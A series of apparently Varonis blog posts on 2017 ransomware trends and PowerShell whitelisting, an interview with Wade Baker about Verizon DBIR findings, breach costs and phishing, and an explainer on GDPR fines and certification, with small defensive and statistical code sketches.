Massive ransomware attacks were the big security story of 2017 — Petya, WannaCry, and NotPetya. By the way, we offered some practical advice on dealing with NotPetya, the Petya variant that was spread through a watering hole — downloaded from the website of a Ukrainian software company.

There are similarities among all of the aforementioned ransomware strains: all exploited EternalBlue and spread using either internal or open external ports. The end result was the same – encrypted files for which companies have to pay ransom in the form of some digital currency.

Ransomware viruses ain’t new either. Old timers may remember the AIDS Trojan, which was DOS-based ransomware spread by sneakernet.

The big difference, of course, is that this current crop of ransomware can lock up entire file systems  — not just individual C drives — and automatically spreads over the Internet or within an organization.

These are truly WMD – weapons of malware destruction. All the ingredients were in place, and it just took enterprising hackers to weaponize the ransomware.

2018?

One area of malware that I believe will continue to be a major headache for IT security is file-less PowerShell and FUD attacks. We wrote a few posts on both these topics in 2017.

Sure, there’s nothing new here either — file-less or malware-free hacking has been used by hackers for years. Some of the tools and techniques have been productized for, cough, pen testing purposes, and so it’s now far easier for anyone to get their hands on these gray tools.

The good news is that Microsoft has made it easier to log PowerShell script execution to spot abnormalities.

The whole topic of whitelisting apps has also picked up speed in recent years. We even tried our own experiments in disabling PowerShell using AppLocker’s whitelisting capabilities. Note: it ain’t easy.
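If you want a starting point for your own experiments, the AppLocker cmdlets can generate a baseline whitelist from software that’s already installed — a rough sketch, not a hardened policy, and it assumes a Windows edition that supports AppLocker:

# Build publisher and hash allow rules from the executables and scripts under Program Files, then merge them into the local policy
Get-AppLockerFileInformation -Directory 'C:\Program Files\' -Recurse -FileType Exe, Script |
    New-AppLockerPolicy -RuleType Publisher, Hash -User Everyone -Optimize |
    Set-AppLockerPolicy -Merge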

Going forward, it looks like Windows 10 Device Guard offers some real promise in preventing rogue malware from running using whitelisting techniques.

The more important point, though, is that security researchers recognize that the hacker will get in, and the goal should be to make it harder for them to run their apps.

Whitelisting is just one aspect of mitigating threats post-exploitation.

Varonis Data Security Platform can help protect data on the inside and notify you when there’s been a breach. Learn more today!

[Video] Varonis GDPR Risk Assessment   

Are you ready for GDPR? According to our survey of 500 IT and risk management decision makers, three out of four are facing serious challenges in achieving compliance when GDPR becomes effective on May 25, 2018. Varonis can help.

A good first step in preparing for GDPR is identifying where EU personal data resides in the file system, and then checking that access permissions are set appropriately. But wait: EU personal data identifiers span 28 member countries, encompassing different formats for license plate numbers, national ID cards, passport IDs, bank accounts, and more.

That’s where our GDPR Patterns can help! We’ve researched and hand-crafted over 250 GDPR classification expressions to help you discover the EU personal data in your systems and analyze your exposure.

To learn more, watch this incredibly informative video and sign up today for our GDPR Risk Assessment.

 

Interview With Wade Baker: Verizon DBIR, Breach Costs, & Selling Boardrooms on Data Security

Wade Baker is best known for creating and leading the Verizon Data Breach Investigations Report (DBIR). Readers of this blog are familiar with the DBIR as our go-to resource for breach stats and other practical insights into data protection. So we were very excited to listen to Wade speak recently at the O’Reilly Data Security Conference.

In his new role as partner and co-founder of the Cyentia Institute, Wade presented some fascinating research on the disconnect between CISOs and the board of directors. In short: if you can’t relate data security spending back to the business, you won’t get a green-light on your project.

We took the next step and contacted Wade for an IOS interview. It was a great opportunity to tap into his deep background in data breach analysis, and our discussion ranged over the DBIR, breach costs, phishing, and what boards look for in security products. What follows is a transcript based on my phone interview with Wade last month.

Inside Out Security: The Verizon Data Breach Investigations Report (DBIR) has been incredibly useful to me in understanding the real-world threat environment. I know one of the first things that caught my attention was that — I think this is pretty much a trend for the last five or six years — external threats or hackers certainly far outweigh insiders.

Wade Baker: Yeah.

IOS: But you’ll see headlines that say just the opposite, the numbers flipped around —‘like 70% of attacks are caused by insiders’. I was wondering if you had any comments on that and perhaps other data points that should be emphasized more?

WB: The whole reason that we started doing the DBIR in the first place, before it was ever a report, is just simply…I was doing a lot of risk-assessment related consulting. And it always really bothered me that I would be trying to make a case, ‘Hey, pay attention to this,’ and I didn’t have much data to back it up.

But there wasn’t really much out there to help me say, ‘This thing on the list is a higher risk because it’s, you know, much more likely to happen than this other thing right here.’

Interesting Breach Statistics

WB: Anyone who’s done those lists knows there’s a bunch of things on this list. When we started doing that, it was kind of a simple notion of, ‘All right, let me find a place where that data might exist, forensic investigations, and I’ll decompose those cases and just start counting things.’

Attributes of incidents, and insiders versus outsiders is one I had always heard — like you said. Up until that point, 80% of all risk or 80% of all security incidents are insiders. And it’s one of those things that I almost consider it like doctrine at that time in the industry!

When we showed pretty much the exact opposite! This is the one stat that I think has made people the most upset out of my 10 years doing that report!

People would push back and kind of argue with things, but that is the one, like, claws came out on that one, like, ‘I can’t believe you’re saying this.’

There are some nuances there. For instance, when you study data breaches, then it does [lean toward outsiders]. Every single data set I ever looked at was weighted toward outsiders.

When you study all security incidents — no matter what severity, no matter what the outcome — then things do start leaning back toward insiders. Just when you consider all the mistakes and policy violations and, you know, just all that kind of junk.

Social attacks and phishing have been on the rise in recent years. (Source: Verizon DBIR)

IOS: Right, yes.

WB: I think defining terms is important, and one reason why there’s disagreement. Back to your question about other data points in the report that I love.

The ones that show the proportion of breaches that tie back to relatively simple attacks, which could have been thwarted by relatively cheap defenses or processes or technologies.

I think we tend to have this notion — maybe it’s just an excuse — that every attack is highly sophisticated and every fix is expensive. That’s just not the case!

The longer we believe those kind of things, I think we just sit back and don’t actually do the sometimes relatively simple stuff that needs to be done to address the real threat.

I love that one, and I also love the time to detection. We threw that in there almost as a whim, just saying, ‘It seems like a good thing to measure about a breach.’

We wanted to see how long it takes, you know, from the time they start trying to link to it, and from the time they get inside to the time they find data, and from the time they find the data to exfiltrating it. Then of course how long it takes to detect it.

I think that was some of the more fascinating findings over the years, just concerning that.

IOS: I’m nodding my head about the time to discovery. Everything we’ve learned over the last couple of years seems to validate that. I think you said in one of your reports that the proper measurement unit is months. I mean, minimally weeks, but months. It seems to be verified by the bigger hacks we’ve heard about.

WB: I love it because many other people started publishing that same thing, and it was always months! So it was neat to watch that measurement vetted out over multiple different independent sources.

Breach Costs

IOS: I’m almost a little hesitant to get into this, but recently you started measuring breach cost based on proprietary insurance data. I’ve been following the controversy.

Could you just talk about it in general and maybe some of your own thoughts on the disparities we’ve been seeing in various research organizations?

WB: Yeah, that was something that for so long, because of where we got our information, it was hard to get all of the impact side out of a breach. Because you do a forensic investigation, you can collect really good info about how it happened, who did it, and that kind of thing, but it’s not so great six months or a year down the road.

You’re not still inside that company collecting data, so you don’t get to see the fallout unless it becomes very public (and sometimes it does).

We were able to study some costs — like the premier, top of line breach cost stats you always hear about from Ponemon.

IOS: Yes.

WB: And I’ve always had some issues with that, not to get into throwing shade or anything. The per record cost of a breach is not a linear type equation, but it’s treated like that.

What you get many times is something like an Equifax, 145 million records. Plus you multiply that by $198 per record, and we get some outlandish cost, and you see that cost quoted in the headlines. It’s just not how it works!

There’s a decreasing cost per record as you get to larger breaches, which makes sense.

There are other factors there that are involved. For instance, I saw a study from RAND, by Sasha Romanosky recently, where after throwing in predictors like company revenue and whether or not they’ve had a breach before — repeat offenders so to speak — and some other factors, then she really improves the cost prediction in the model.

I think those are the kind of things we need to be looking at and trying to incorporate because I think the number of records is probably, at best, describes about a third … I don’t even know if it gets to a half of the cost on the breach.

Breach costs do not have a linear relationship with data records! (Source: 2015 Verizon DBIR)

IOS: I did look at some of these reports and I’m a little skeptical about the number of records itself as a metric because it’s hard to know this, I think.

But if it’s something you do on a per incident basis, then the numbers look a little bit more comparable to Ponemon.

Do you think it’s a problem, looking at it on per record basis?

WB: First of all, an average cost per record, I would like to step away from that as a metric, just across the board.  But tying cost to the number of records probably…I mean, it works better for, say, consumer data or payment card data or things like that where the costs are highly associated with the number of people affected. You then get into cost of credit monitoring and the notifications. All of those type things are certainly correlated to how many people or consumers are affected.

When you talk about IP or other types of data, there’s just almost no correlation. How do you count a single stolen document as a record? Do you count megabytes? Do you count documents?

Those things have highly varied value depending on all kinds of circumstances. It really falls down there.

What Boards Care About

IOS: I just want to get back to your O’Reilly talk. And one of the things that also resonated with me was the disconnect between the board and the CISOs who have to explain investments. And you talk about that disconnect.

I was looking at your blog and Cyber Balance Sheet reports, and you gave some examples of this — something that the CISO thinks is important, the board is just saying, ‘What?’

So I was wondering if you can mention one or two examples that would give some indication of this gap?

WB: The CISOs have been going to the board probably for several rounds now, maybe years, presenting information, asking for more budgets, and the board is trying to ‘get’ what they need to build a program to do the right things.

Pretty soon, many boards start asking, ‘When are we done? We spent money on security last month. Why are we doing it this quarter too?’

Security as a continual and sometimes increasing investment is different than a lot of other things that they look at. They think of, ‘Okay, we’re going to spend money on this project, get it done, and we’re going to have this value at the end of that.’

We can understand those things, but security is just not like that. I’ve seen this breaking down a lot with CISOs, who are coming from, ‘We need to do this project.’

You lay on top of all this that the board is not necessarily going to see the fruits of their investment in security! Because if it works, they don’t see anything bad at all.

Another problem that CISOs have is ‘how do I go to them when we haven’t had any bad things happen, and asking for more money?’ It’s just a conversation where you should be prepared to say why that is —  connect these things to the business.

By doing these things, we’re enabling these pieces of the business to function properly. It’s a big problem, especially for more traditional boards that are clearly focused on driving revenue and other areas of the business.

IOS: Right. I’m just thinking out loud now … Is the board comparing it to physical security, where I’m assuming you make this initial investment in equipment, cameras, and recording and whatever, and then your costs, going forward, are mostly people or labor costs?

They probably are looking at it and saying,  ‘Why am I spending more? Why am I buying more cameras or more modern equipment?’

WB: I think so! I’ve never done physical security, other than as a sideline to information security. Even if there are continuing costs, they live in that physical world. They can understand why, ‘Okay, we had a break-in last month, so we need to, I don’t know, add a guard gate or something like that.’ They get why and how that would help.

Whereas in the logical or cyber security world, they sometimes really don’t understand what you’re proposing, why it would work. If you don’t have their trust, they really start trying to poke holes. Then if you’re not ready to answer the question, things just kind of go downhill from there.

They’re not going to believe that the thing you’re proposing is actually going to fix the problem. That’s a challenge.

IOS: I remember you mentioning during your O’Reilly talk that helpful metaphors can be useful, but it has to be the right metaphor.

WB: Right.

IOS: I mean, getting back to the DBIR. In the last couple of years, there was an uptick in phishing. I think probably this should enter some of these conversations because it’s such an easy way for someone to get inside. For us at Varonis, we’ve been focused on ransomware lately, and there are also DDoS attacks as well.

Will these newer attacks shift the board’s attention to something they can really understand, since these attacks actually disrupt operations?

WB: I think it can, because things like ransomware and DDoS are apparent just kind of in and of themselves. If they transpire, it becomes obvious and there are bad outcomes.

Whereas more cloak-and-dagger stealing of intellectual property or siphoning a bunch of consumer data is not going to become apparent, or if it is, it’s months down the road, like we talked about earlier.

I think these things are attention-getters within a company, attention-getters from the headlines. I mean, from what I’ve heard over the past year, as this ransomware has been steadily increasing, it has definitely received the board’s attention!

I think it is a good hook to get in there and show them what you’re doing. And ransomware is a good one because it has a corporate aspect and a personal aspect.

You can talk to the board about, ‘Hey, you know, this applies to us as a company, but this is a threat to you in your laptop in your home as well. What about all those pictures that you have? Do you have those things backed up? What if they got on your data at home?’

And then walk through some of the steps and make it real. I think it’s an excellent opportunity for that. It’s not hype, it’s actually occurring and at the top of the list in many areas!

Contrary to conventional wisdom, corporate boards of directors understand the value of data protection. (Source: Cyber Balance Sheet)

IOS: This brings something else to mind. Yes, you could consider some of these breaches as a cost of doing business, but if you’re allowing an outsider to get access to all your files, I would think high-level executives would be a little worried that attackers could find their emails. ‘Well, if they can get in and steal credit cards, then they can also get into my laptop.’

I would think that alone would get them curious!

WB: To be honest, I have found that most of the board members that I talk to, they are aware of security issues and breaches much more than they were five to ten years ago. That’s a good thing!

They might sit on the boards of other companies, and with all the reporting we’ve had, the chance that a board member has been with a company that’s experienced a breach, or knows a buddy who has, is pretty good by now. So it’s a real problem in their minds!

But I think the issue, again, is how do you justify to them that the security program is making that less likely? And many of them are terrified of data breaches, to be honest.

Going back to that Cyber Balance Sheet report, I was surprised when we asked board members what is the biggest value that security provides — you know, kind of the inverse of your biggest fear? They all said preventing data breaches. And I would have thought they’d say, ‘Protect the brand,’ or ‘Drive down risk,’ or something like that. But they answered, ‘Prevent data breaches.’

It just shows you what’s at the top of their minds! They’re fearful of that and they don’t want that to happen. They just don’t have a high degree of trust that the security program will actually prevent them.

IOS: I have to say, when I first started at Varonis, some of these data breach stories were not making the front page of The New York Times or The Washington Post, and that certainly has changed. You can begin to understand the fear. Getting back to something you said earlier about how simple approaches, or, as we call it, block-and-tackle, can prevent breaches.

Another way to mitigate the risk of these breaches is something that you’ve probably heard of, Privacy by Design, or Security by Design. One of the principles is to simply reduce the data that can cause the risk.

Don’t collect as much, don’t store as much, and delete it when it’s no longer used. Is that a good argument to the board?

WB: It is, and I think there are several approaches. I’ve given this recommendation fairly regularly, to be honest: minimize the data that you’re collecting. Because I think a lot of companies don’t need as much data as they’re collecting! It’s just easy and cheap to collect it these days, so why not?

Helping organizations understand that it’s a risk decision, not just a cost decision, is important. And then, of what you collect, how long do you retain it?

Because the longer you retain it and the more you collect, you’re sitting on a mountain of data and you can become a target of criminals just through that fact.

For the data that you do have and you do need to retain … I’m a big fan of trying to consolidate it and not let it spread around the environment.

One of the metrics I like to propose is, ‘Okay, here’s the data that’s important to me. We need to protect it.’ Ask people where that lives or how many systems it should be stored on in the environment, and then go look for it.

You can multiply that number by 3 or 5, or sometimes 10, and that’s the real answer! It’s a good metric to strive for: the number of target systems that information should reside within. Many breaches come from places where that data should not have been.
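
A minimal sketch of that sprawl metric, with entirely made-up system names, just compares where a sensitive data set is supposed to live against where a discovery scan actually found copies:

```python
# Hypothetical sprawl check: expected locations vs. what a discovery scan found.
expected = {"crm-db", "hr-share"}                  # where the data should reside
found = {"crm-db", "hr-share", "marketing-share",  # where copies actually turned up
         "laptop-42", "old-backup"}

sprawl_ratio = len(found) / len(expected)          # the 3x/5x/10x multiplier above
strays = sorted(found - expected)                  # copies that shouldn't exist

print(f"Sprawl ratio: {sprawl_ratio:.1f}x the expected footprint")
print(f"Locations to clean up or justify: {strays}")
```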

Security Risk Metrics

IOS: That leads to the next question about risk metrics. One we use at Varonis is PII data that has Windows permissions marked for Everyone. Customers are always surprised during assessments when they see how much of it there is.

This relates to stale data. It could be, you know, PII data that hasn’t been touched in a while. It’s sitting there, as you mentioned. No one’s looking at it, except the hackers who will get in and find it!
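
For the staleness half of that metric, a rough sketch (the share path and threshold below are made up) can simply walk a file tree and flag anything untouched for a year; checking Windows “Everyone” permissions would need platform-specific tooling on top of this:

```python
import os
import time

ROOT = r"\\fileserver\finance"   # hypothetical file share
STALE_DAYS = 365                 # "hasn't been touched in a while"
cutoff = time.time() - STALE_DAYS * 86400

stale = []
for dirpath, _, filenames in os.walk(ROOT):
    for name in filenames:
        path = os.path.join(dirpath, name)
        try:
            if os.path.getmtime(path) < cutoff:
                stale.append(path)
        except OSError:          # skip files we can't stat
            pass

print(f"{len(stale)} files untouched for {STALE_DAYS}+ days")
```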

Are there other good risk metrics specifically related to data?

WB: Yup, I like those. You mentioned phishing a while ago. I like stats such as the number of employees that will click through, say, if you do a phishing test in the organization. I think that’s always kind of an eye-opening one because boards and others can realize that, ‘Oh, okay. That means we got a lot of people clicking, and there’s really no way we can get around that, so that forces us to do something else.’

I’m a fan of measuring things like number of systems compromised in any given time, and then the time that it takes to clean those up and drive those two metrics down, with a very focused effort over time, to minimize them. You mentioned people that have…or data that has Everyone access.

Varonis stats on loosely permissioned folders.

IOS: Yes.

WB: I always like to know, whether it’s a system or an environment or a scope, how many people have admin access! Because we’re highly over-privileged in most environments.

I’ve seen eyes pop, where people say, ‘What? We can’t possibly have that many people that have that level of need to know on…for that kind of thing.’ So, yeah, that’s a few off the top of my head.

IOS: Back to phishing. I interviewed Zinaida Benenson a couple months ago — she presented at Black Hat. She did some interesting research on phishing and click rates. Now, it’s true that she looked at college students, but the rates were astonishing. It was something like 40% were clicking on obvious junk links in Facebook messages and about 20% in email spam.

She really feels that someone will click and it’s almost impossible to prevent that in an organization. Maybe as people get a little older, they won’t click as much, but they will click.

WB: I’ve measured click rates at about 23%, 25%. So 20% to 25% in organizations. And not only in organizations, but organizations that paid to have phishing trials done. So I got that data from, you know, a company that provides us phishing tests.

You would think these would be the organizations that say, ‘Hey, we have a problem, I’m aware. I’m going to the doctor.’ Even among those, one in four are clicking. By the time an attacker sends 10 emails within the organization, there’s like a 99% rate that someone is going to click.
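
The arithmetic behind that estimate is straightforward if you assume, as a simplification, that each recipient clicks independently at roughly the measured rate:

```python
def chance_someone_clicks(click_rate: float, emails: int) -> float:
    """Probability that at least one of `emails` recipients clicks."""
    return 1 - (1 - click_rate) ** emails

print(f"{chance_someone_clicks(0.25, 10):.0%}")  # ~94% at a 25% per-person click rate
print(f"{chance_someone_clicks(0.37, 10):.0%}")  # ~99% at a rate closer to 37%
```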

Students will click on obvious spammy links. (Source: Zinaida Benenson’s 2016 Black Hat presentation)

IOS: She had some interesting things to say about curiosity and feeling bold. Some people, when they’re in a good mood, they’ll click more.

I have one more question on my list … about whether data breaches are a cost of business or are being treated as a cost of business.

WB: That’s a good one.

IOS: I had given an example of shrinkage in retail as a cost of business. Retailers just always assume that, say, there’s a 5% shrinkage. Or is security treated — I hope it will be treated — differently?

WB: As far as I can tell, we do not treat it like that. But I’ll be honest, I think treating it a little bit like that might not be a bad thing! In other words, there have been some studies that look at the losses due to breaches and incidents versus losses like shrinkage and other things that are just very, very common, and therefore we’re not as fearful of them.

Shrinkage takes many, many more…I can’t remember what the…but it was a couple orders of magnitude more, you know, for a typical retailer than data breaches.

We’re much more fearful of breaches, even at the board level. And I think that’s because they’re not as well understood and they’re a little bit newer and we haven’t been dealing with it.

When you’re going to have certain losses like that and they’re fairly well measured, you can draw a distribution around them and say that I’m 95% confident that my losses are going be within this limit.

Then that gives you something definite to work with, and you can move on. I do wish we could get there with security, where we figure out, ‘All right, I am prepared to lose this much.’

Yes, we may have a horrifying event that takes us outside of that, and I don’t want that to happen. But we can handle this, and we handle it in these ways. I think that’s an important maturity step that we need to get to. We just don’t have the data to get there quite yet.
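
For what that could look like, here is a toy sketch with entirely made-up loss figures: if routine losses were well measured, a high percentile of the historical distribution would give you the ‘I’m 95% confident losses stay under X’ statement described above:

```python
import random
import statistics

# Toy example: simulate 200 "years" of routine incident losses (made-up
# lognormal parameters), then read off a 95th-percentile bound.
random.seed(1)
annual_losses = [random.lognormvariate(11, 0.6) for _ in range(200)]

p95 = sorted(annual_losses)[int(0.95 * len(annual_losses)) - 1]

print(f"Median annual loss: ${statistics.median(annual_losses):,.0f}")
print(f"95th percentile:    ${p95:,.0f}")
```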

IOS: I hear what you’re saying. But there’s just something about security and privacy that may be a little bit different …

WB: There is. There certainly is! Security has externalities: it’s not just affecting my company, like shrinkage, where I can absorb those dollars. My failures may affect other people, my partners, consumers, and, if you’re in critical infrastructure, society. I mean, that makes a huge difference!

IOS: Wade, this has been an incredible discussion on topics that don’t get as much attention as they should.

Thanks for your insights.

WB: Thanks Andy. Enjoyed it!

Do Your GDPR Homework and Lower Your Chance of Fines

Advice that was helpful during your school days is also relevant when it comes to complying with the General Data Protection Regulation (GDPR): do your homework because it counts for part of your grade! In the case of the GDPR, your homework assignments involve developing and implementing privacy by design measures, and making sure these policies are published and known to management.

Taking good notes and doing homework assignments came to mind when reading the new guideline published last month on GDPR fines. Here’s what the EU regulators have to say:

Rather than being an obligation of goal, these provisions introduce obligations of means, that is, the controller must make the necessary assessments and reach the appropriate conclusions. The question that the supervisory authority must then answer is to what extent the controller “did what it could be expected to do” given the nature, the purposes or the size of the processing, seen in light of the obligations imposed on them by the Regulation.

The supervisory authority referenced above is what we used to call the data protection authority or DPA, which is in charge of enforcing the GDPR in an EU country. So the supervisory authority is supposed to ask whether the controller, EU-speak for the company collecting the data, did its homework — “did what it could be expected to do” — when determining the fines involved in a GDPR complaint.

Teachers Know Best

There are other factors in this guideline that affect the level of fines, including the number of data subjects, the seriousness of the damage (“risks to rights and freedoms”), the categories of data that have been accessed, and willingness to cooperate and help the supervisory authority. You could argue that some of this is out of your control once the hackers have broken through the first level of defenses.

But what you can control is the effort your company has put into its security program to limit those risks.

I’m also reminded of what Hogan Lovells’ privacy attorney Sue Foster told us during an interview about the importance of “showing your work”.  In another school-related analogy, Foster said you can get “partial credit” if you show that to the regulators after an incident that you have security processes in place.

She also predicted we’d get more guidance, and that’s what the aforementioned document does: it explains what factors are taken into account when issuing fines under the GDPR’s two-tiered system of up to 2% or 4% of global revenue. Thanks Sue!

Existing Security Standards Count

The guideline also contains some very practical advice on compliance. Realizing that many companies already rely on existing data standards, such as ISO 27001, the EU regulators are willing to give some partial credit if you follow these standards.

… due account should be taken of any “best practice” procedures or methods where these exist and apply. Industry standards, as well as codes of conduct in the respective field or profession are important to take into account. Codes of practice might give indication of the level of knowledge about different means to address typical security issues associated with the processing.

Those who want to read the fine print can refer to Article 40 (“Codes of Conduct”) of the GDPR. In short, it says that standards associations can submit their security controls, say PCI DSS, to the European Data Protection Board (EDPB) for approval. If a controller then follows an officially approved “code of conduct”, this can dissuade the supervisory authority from taking actions, including issuing fines, as long as the standards group — for example, the PCI Security Standards Council — has its own monitoring mechanism to check on compliance.

Based on this particular GDPR guideline, it will soon be the case that those who have done the homework of being PCI compliant will be in a better position to deal with EU regulators.

Certifiably GDPR

The GDPR, though, goes a step further. It leaves open a path to official certification of a controller’s data operations!

In effect, the supervisory authorities have the power (through Article 42) to certify a controller’s operations as GDPR compliant. A supervisory authority can also accredit other organizations to issue these certifications.

In any case, the certifications will expire after three years, at which point the company will need to re-certify.

I should add that these certifications are entirely voluntary, but there are obvious benefits for many companies. The intent is to leverage the private sector’s existing data standards and give companies a more practical approach to complying with the GDPR’s technical and administrative requirements.

The EDPB is also expected to develop certification marks and seals for consumers, as well as a registry of certified companies.

We’ll have to wait for more details to be published by the regulators on GDPR certification.

In the short term, companies that already have programs in place to comply with PCI DSS, ISO 27001, and other data security standards should be in a better position with respect to GDPR fines.

And in the very near future, a “European Data Protection Seal” might just become a sought-after logo on company websites.

Want to reduce your GDPR fines? Varonis helps support many different data security standards. Find out more!